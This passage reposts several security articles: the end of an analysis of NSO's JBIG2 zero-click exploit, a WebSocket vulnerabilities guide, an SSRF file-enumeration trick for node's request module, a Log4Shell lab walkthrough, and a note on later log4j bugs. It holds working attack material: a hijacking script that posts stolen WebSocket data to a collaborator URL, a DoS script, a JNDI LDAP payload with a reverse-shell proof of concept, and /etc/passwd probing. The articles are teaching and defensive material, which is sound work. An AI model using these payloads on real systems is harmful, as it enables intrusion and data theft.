canvas coordinates they can write to all the fields of the page JBIG2Bitmap and by carefully choosing new values for w, h and line, they can write to arbitrary offsets from the page backing buffer. At this point it would also be possible to write to arbitrary absolute memory addresses if you knew their offsets from the page backing buffer. But how to compute those offsets? Thus far, this exploit has proceeded in a manner very similar to a "canonical" scripting language exploit which in Javascript might end up with an unbounded ArrayBuffer object with access to memory. But in those cases the attacker has the ability to run arbitrary Javascript which can obviously be used to compute offsets and perform arbitrary computations. How do you do that in a single-pass image parser? My other compression format is turing-complete! As mentioned earlier, the sequence of steps which implement JBIG2 refinement are very flexible. Refinement steps can reference both the output bitmap and any previously created segments, as well as render output to either the current page or a segment. By carefully crafting the context-dependent part of the refinement decompression, it's possible to craft sequences of segments where only the refinement combination operators have any effect. In practice this means it is possible to apply the AND, OR, XOR and XNOR logical operators between memory regions at arbitrary offsets from the current page's JBIG2Bitmap backing buffer. And since that has been unbounded… it's possible to perform those logical operations on memory at arbitrary out-of-bounds offsets: The memory layout showing how logical operators can be applied out-of-bounds It's when you take this to its most extreme form that things start to get really interesting. What if rather than operating on glyph-sized sub-rectangles you instead operated on single bits? You can now provide as input a sequence of JBIG2 segment commands which implement a sequence of logical bit operations to apply to the page. And since the page buffer has been unbounded those bit operations can operate on arbitrary memory. With a bit of back-of-the-envelope scribbling you can convince yourself that with just the available AND, OR, XOR and XNOR logical operators you can in fact compute any computable function - the simplest proof being that you can create a logical NOT operator by XORing with 1 and then putting an AND gate in front of that to form a NAND gate: An AND gate connected to one input of an XOR gate. The other XOR gate input is connected to the constant value 1 creating an NAND. A NAND gate is an example of a universal logic gate; one from which all other gates can be built and from which a circuit can be built to compute any computable function. Practical circuits JBIG2 doesn't have scripting capabilities, but when combined with a vulnerability, it does have the ability to emulate circuits of arbitrary logic gates operating on arbitrary memory. So why not just use that to build your own computer architecture and script that!? That's exactly what this exploit does. Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent. The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying. In a future post (currently being finished), we'll take a look at exactly how they escape the IMTranscoderAgent sandbox. Sursa: https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html
-
Websocket: common vulnerabilities plaguing it and managing them. Home Cybersecurity Websocket: common vulnerabilities plaguing it and managing them. Published by Surendiran S at December 17, 2021 What is WebSocket? Efficient two-way communication protocol WebSocket is stateful where HTTP is stateless Two main parts: Handshake and data transfer WebSockets allows the client/server to create a bidirectional communication channel. Then the client and server communicate asynchronously, and messages can be sent in either direction. WebSockets are particularly useful in situations where low-latency or server-initiated messages are required, such as real-time feeds of data, online chat applications, message boards, web interfaces, and commercial applications. The format of a WebSocket URL: ws://redacted.com used for unencrypted connection wss://redacted.com used for a secure SSL connection The browser and server perform a WebSocket handshake using HTTP to connect. The browser issues a WebSocket handshake request, and if the server accepts the connection then, it returns a WebSocket handshake response. After the response, the network connection remains open and can be used to send WebSocket messages in both directions. Using the shodan.io search engine, it is possible to find WebSocket applications on the Internet. Search Query: Sec-WebSocket-Version Vulnerabilities in WebSocket Some vulnerability that occurs in websocket application: Cross-site websocket hijacking Unencrypted communication Denial of service Input vulnerabilities, etc… Cross-Site WebSocket Hijacking: Cross-site WebSocket hijacking is also known as cross-origin WebSocket hijacking. It is possible when the server relies only on the session authentication data (cookies) to perform an authenticated action and the origin is not properly checked by the application. When users open the attacker-controlled site, a WebSocket is established in the context of the user’s session. Attackers can connect to the vulnerable application using the attacker-controlled domain. Then the attacker can communicate with the server via WebSockets without the victim’s knowledge. Attackers can then communicate with the application through the WebSocket connection and also access the server’s responses. A common script that can be used for exploitation of this vulnerability can be found below: <script> var ws = new WebSocket(‘wss://redacted.com’); ws.onopen = function() { ws.send(“READY”); }; ws.onmessage = function(event) { fetch(‘https://your-collaborator-url’, {method: ‘POST’, mode: ‘no-cors’, body: event.data}); }; </script> An attacker can observe exfiltrated data in the HTTP interactions request body. Unencrypted Communications: WS is a plain-text protocol just like HTTP. The information is transferred through an unencrypted TCP channel, and An attacker can capture and modify the traffic over the network. Denial of Service: WebSockets allow unlimited connections by default which leads to DOS. The Affected ws package, versions <1.1.5 >=2.0.0 <3.3. The following script can be used to perform DOS attacks on vulnerable applications. const WebSocket = require(‘ws’); const net = require(‘net’); const wss = new WebSocket.Server({ port: 3000 }, function () { const payload = ‘constructor’; // or ‘,;constructor’ const request = [ ‘GET / HTTP/1.1’, ‘Connection: Upgrade’, ‘Sec-WebSocket-Key: test’, ‘Sec-WebSocket-Version: 8’, Sec-WebSocket-Extensions: ${payload}, ‘Upgrade: websocket’, ‘\r\n’ ].join(‘\r\n’); const socket = net.connect(3000, function () { socket.resume(); socket.write(request); }); }); Input Validation Vulnerabilities: Injection attacks occur when an attacker passes malicious input via WebSockets to the application. Some possible kinds of attacks are XSS, SQL injections, code injections, etc. Example: Let’s say the application uses Websockets and the attacker passes a malicious input in the UI of the application. In this case, the input is HTML-encoded by the client before sending it to the server, but the attacker can intercept the request with a web proxy and modify the input with a malicious payload. Observe that input passed by the attacker is executed by the application. Mitigation: It is recommended to follow the protective measures when implementing the web sockets: Use of encrypted (TLS) WebSockets connection. The URI scheme for it is wss:// Checking the ‘Origin’ header of the request. This header was designed to protect against cross origin attacks. If the ‘Origin’ is not trusted, then simply reject the request. Use session-based individual random tokens (just like CSRF-Tokens). Generate them server-side and have them in hidden fields on the client-side and verify them at the request. Input validation of messages using the data model in both directions. Output encoding of messages when they are embedded in the web application. Conclusion Websocket is a bi-directional communication protocol over a single TCP. Websocket helps handle high scale data transfers between server clients. But one has to be careful while using Websocket as it has vulnerabilities like Cross-site WebSocket hijacking, Unencrypted communication, Denial of service, etc. References: https://book.hacktricks.xyz/pentesting-web/cross-site-websocket-hijacking-cswsh https://cobalt.io/blog/a-pentesters-guide-to-websocket-pentesting https://infosecwriteups.com/cross-site-websocket-hijacking-cswsh-ce2a6b0747fc https://portswigger.net/web-security/websockets https://www.vaadata.com/blog/websockets-security-attacks-risks Surendiran S An intern security consultant at SecureLayer7, Surendiran always brings some unique ideas to the table. With him having just peeped into security consulting and analysis, he is currently exploring the world of cybersecurity and expanding his scope. Sursa: https://blog.securelayer7.net/websocket-common-vulnerabilities-plaguing-it-and-managing-them/
-
- 1
-
Enumerating Files Using Server Side Request Forgery and the request Module Written by Adam Baldwin with ♥ on 15 December 2017 in 2 min If you ever find Server Side Request Forgery (SSRF) in a node.js based application and the app is using the request module you can use a special url format to detect the existence of files / directories. While request does not support the file:// scheme it does supports a special url format to communicate with unix domain sockets and the errors returned from a file existing vs not existing are different. The format looks like this. http://unix:SOCKET:PATH and for our purposes we can ignore PATH all together. Let’s take this code for example. We’re assuming that as a user we can somehow control the url. File exists condition: const Request = require('request') Request.get('[http://unix:/etc/passwd'](http://unix:/etc/passwd'), (err) => { console.log(err) }) As /etc/password exists request will try and use it as a unix socket, of course it is not a unix socket so it will give a connection failure error. { Error: connect **ENOTSOCK** /etc/passwd at Object._errnoException (util.js:1024:11) at _exceptionWithHostPort (util.js:1046:20) at PipeConnectWrap.afterConnect [as oncomplete] (net.js:1182:14) code: 'ENOTSOCK', errno: 'ENOTSOCK', syscall: 'connect', address: '/etc/passwd' } File does not exist condition: Using the same code with a different file that does not exist. const Request = require('request') Request.get('[http://unix:/does/not/exist'](http://unix:/etc/passwd'), (err) => { console.log(err) }) The resulting error looks like this. { Error: connect **ENOENT** /does/not/exist at Object._errnoException (util.js:1024:11) at _exceptionWithHostPort (util.js:1046:20) at PipeConnectWrap.afterConnect [as oncomplete] (net.js:1182:14) code: 'ENOENT', errno: 'ENOENT', syscall: 'connect', address: '/does/not/exist' } The different is small: ENOTSOCK, vs ENOENT While not that severe of an issue on its own it’s a trick that’s help me on past security assessments to enumerate file path locations. Maybe you’ll find it useful too. Originally posted on Medium Author: Adam Baldwin Sursa: https://evilpacket.net/2017/enumerating-files-using-server-side-request-forgery-and-the-request-module/
-
A Detailed Guide on Log4J Penetration Testing December 18, 2021 By Raj Chandel In this article, we are going to discuss and demonstrate in our lab setup, the exploitation of the new vulnerability identified as CVE-2021-44228 affecting the java logging package, Log4J. This vulnerability has a severity score of 10.0, most critical designation and offers remote code execution on hosts engaging with software that uses log4j utility. This attack has also been called “Log4Shell”. Table of Content Log4jShell What is log4j What is LDAP and JNDI LDAP and JNDI Chemistry Log4j JNDI lookup Normal Log4j scenario Exploit Log4j scenario Pentest Lab Setup Exploiting Log4j (CVE-2021-44228) Mitigation Log4jshell CVE-2021-44228 Description: Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. Vulnerability Type Remote Code Execution Severity Critical Base CVSS Score 10.0 Versions Affected All versions from 2.0-beta9 to 2.14.1 CVE-2021-45046 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments; remote code execution has been demonstrated on macOS but no other tested environments. Vulnerability Type Remote Code Execution Severity Critical Base CVSS Score 9.0 Versions Affected All versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 CVE-2021-45105 Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process. This is also known as a DOS (Denial of Service) attack. Vulnerability Type Denial of Service Severity High Base CVSS Score 7.5 Versions Affected All versions from 2.0-beta9 to 2.16.0 What is Log4J. Log4j is a Java-based logging utility that is part of the Apache Logging Services. Log4j is one of the several Java logging frameworks which is popularly used by millions of Java applications on the internet. What is LDAP and JNDI LDAP (Lightweight Directory Access Protocol) is an open and cross-platform protocol that is used for directory service authentication. It provides the communication language that the application uses to communicate with other directory services. Directory services store lots of important information like, user accounts details, passwords, computer accounts, etc which are shared with other devices on the network. JNDI (Java Naming and Directory Interface) is an application programming interface (API) that provides naming and directory functionality to applications written using Java Programming Language. JNDI and LDAP Chemistry JNDI provides a standard API for interacting with name and directory services using a service provider interface (SPI). JNDI provides Java applications and objects with a powerful and transparent interface to access directory services like LDAP. The table below shows the common LDAP and JNDI equivalent operations. Log4J JNDI Lookup Lookups are a kind of mechanism that add values to the log4j configuration at arbitrary places. Log4j has the ability to perform multiple lookups such as map, system properties and JNDI (Java Naming and Directory Interface) lookups. Log4j uses the JNDI API to obtain naming and directory services from several available service providers: LDAP, COS (Common Object Services), Java RMI registry (Remote Method Invocation), DNS (Domain Name Service), etc. if this functionality is implemented, then we should this line of code somewhere in the program: ${jndi:logging/context-name} A Normal Log4J Scenario The above diagram shows a normal log4j scenario. Exploit Log4j Scenario An attacker who can control log messages or log messages parameters can execute arbitrary code on the vulnerable server loaded from LDAP servers when message lookup substitution is enabled. As a result, an attacker can craft a special request that would make the utility remotely downloaded and execute the payload. Below is the most common example of it using the combination of JNDI and LDAP: ${jndi:ldap://<host>:<port>/<payload>} An attacker inserts the JNDI lookup in a header field that is likely to be logged. The string is passed to log4j for logging. Log4j interpolates the string and queries the malicious LDAP server. The LDAP server responds with directory information that contains the malicious Java Class. Java deserialize (or download) the malicious Java Class and executes it. Pentest Lab Setup In the lab setup, we will use Kali VM as the attacker machine and Ubuntu VM as the target machine. So let’s prepare the ubuntu machine. git clone https://github.com/kozmer/log4j-shell-poc.git Once the git clone command has been completed, browse to the log4j-shell-poc directory: Once inside that directory, we can now execute the docker command: cd log4j-shell-poc docker build -t log4j-shell-poc . After that, run the second command on the github page: docker run --network host log4j-shell-poc These commands will enable us to use the docker file with a vulnerable app. Once completed, we have our vulnerable webapp server ready. Now let’s browse to the target IP address in our kali’s browser at port 8080. So, this is the docker vulnerable application and the area which is affected by this vulnerability is the username field. It is here that we are going to inject our payload. So now, the lab setup is done. We have our vulnerable target machine up and running. Time to perform the attack. Exploiting Log4j (CVE-2021-44228) On the kali machine, we need to git clone the same repository. So type the following command: git clone https://github.com/kozmer/log4j-shell-poc.git Now we need to install the JDK version. This can be downloaded at the following link. https://mirrors.huaweicloud.com/java/jdk/8u202-b08/ Click on the correct version and download that inside the Kali Linux. Now go to the download folder and unzip that file by executing the command then move the extracted file to the /usr/bin folder tar -xf jdk-8u202-linux-x64.tar.gz mv jdk-8u202 /usr/bin cd /usr/bin Once verified, let’s exit from this directory and browse to the log4j-shell-poc directory. That folder contains a python script, poc.py which we are going to configure as per our lab setup settings. Here you need to modify ‘./jdk1.8.2.20/’ to ‘/usr/bin/jdk1.8.0_202/ as highlighted. what we have done here is we have to change the path of the java location and the java version in the script. Now that all changes have been made, we need to save the file and get ready to start the attack. In attacker machine, that is the Kali Linux, we will access the docker vulnerable webapp application inside a browser by typing the IP of the ubuntu machine:8080 Now let’s initiate a netcat listener and start the attack. Type the following command python3 poc.py --userip 192.168.29.163 --webport 8000 --lport 9001 in a terminal. Make sure you are in the log4j-shell-poc directory when executing the command. This script started the malicious local LDAP server. Now let Copy the complete command after send me: ${jndi:ldap://192.168.29.163:1389/a} paste it inside the browser in the username field. This will be our payload. In the password field, you can provide anything. Click on the login button to execute the payload. Then switch to the netcat windows where we should get a reverse shell. We are finally inside that vulnerable webapp docker image. Mitigation CVE-2021-44228: Fixed in Log4j 2.15.0 (Java 😎 Implement one of the following mitigation techniques: Java 8 (or later) users should upgrade to release 2.16.0. Java 7 users should upgrade to release 2.12.2. Otherwise, in any release other than 2.16.0, you may remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class Users are advised not to enable JNDI in Log4j 2.16.0. If the JMS Appender is required, use Log4j 2.12.2 CVE-2021-45046: Fixed in Log4j 2.12.2 (Java 7) and Log4j 2.16.0 (Java 😎 Implement one of the following mitigation techniques: Java 8 (or later) users should upgrade to release 2.16.0. Java 7 users should upgrade to release 2.12.2. Otherwise, in any release other than 2.16.0, you may remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class Users are advised not to enable JNDI in Log4j 2.16.0. If the JMS Appender is required, use Log4j 2.12.2. CVE-2021-45105: Fixed in Log4j 2.17.0 (Java 😎 Implement one of the following mitigation techniques: Java 8 (or later) users should upgrade to release 2.17.0. In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC). Otherwise, in the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input. To read more about mitigation, you can access the following link https://logging.apache.org/log4j/2.x/security.html Author: Tirut Hawoldar is a Cyber Security Enthusiast and CTF player with 15 years of experience in IT Security and Infrastructure. Can be Contacted on LinkedIn Sursa: https://www.hackingarticles.in/a-detailed-guide-on-log4j-penetration-testing/
-
- 3
-
The Subsequent Waves of log4j Vulnerabilities Aren’t as Bad as People Think Attacks against 2.15 and the CLI fix require a non-standard logging config By DANIEL MIESSLER in INFORMATION SECURITY CREATED/UPDATED: DECEMBER 18, 2021 Home / Information Security / The Subsequent Waves of log4j Vulnerabilities Aren’t as Bad as People Think If you’re reading this you’re underslept and over-caffeinated due to log4j. Thank you for your service. I have some good news. I know a super-smart guy named d0nut who figured something out like 3 days ago that very few people know. Once you have 2.15 applied—or the CLI implementation to disable lookups—you actually need a non-default log4j2.properties configuration to still be vulnerable! Read that again. Related day-1 skills that cybersecurity hiring managers are looking for The bypasses of 2.15 and the NoLookups CLI change don’t affect people unless they have non-defalt logging configurations. From the Apache advisory: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern. apache project security advisory “Certain non-default configurations”. I’ve never heard a sweeter set of syllables. These can also be set in log4j2.xml or programatically. So you need to have changed your configs to include patterns like: $${ctx:loginId} ${ctx ${event ${env Related new study shows you can predict credit rating from your online tech fingerprint …etc to be vulnerable to a 2.15 patch level or a log4j2.formatMsgNoLookups or LOG4J_FORMAT_MSG_NO_LOOKUPS = true bypass! That’s huge! And Nate figured this out like 4 days ago! He mentioned to me multiple times this wasn’t as bad as people thought, but he wasn’t shouting from the rooftops so I didn’t listen well enough. Shame on me. Related the owasp iot logging project He also happens to have a strong meme game. Summary The first vuln was just as bad as everyone thinks it is. Or worse. It did not require this non-default logging configuration. But if you are patched to 2.15, or mitigated with the NoLookup config, you are no longer vulnerable unless you ALSO have a logging config option set in your log4j2.properties file that re-enables them. So, if you’re already patched to 2.15 and/or have the mitigation in place, and don’t have non-standard configs—which you should confirm—you might be able to sleep for a bit. And of course of course—keep in mind that this all only pertains to vulnerabilities we know about today. And the internet moves fast. Finally, d0nut is awesome and you should follow his work. Notes This also applies to the DoS that 2.17 addresses. Thanks to Nate for the great find! Written By Daniel Miessler Daniel Miessler is a cybersecurity leader, writer, and founder of Unsupervised Learning. He writes about security, tech, and society and has been featured in the New York Times, WSJ, and the BBC. Sursa: https://danielmiessler.com/blog/the-second-wave-of-log4j-vulnerabilities-werent-nearly-as-bad-as-people-think/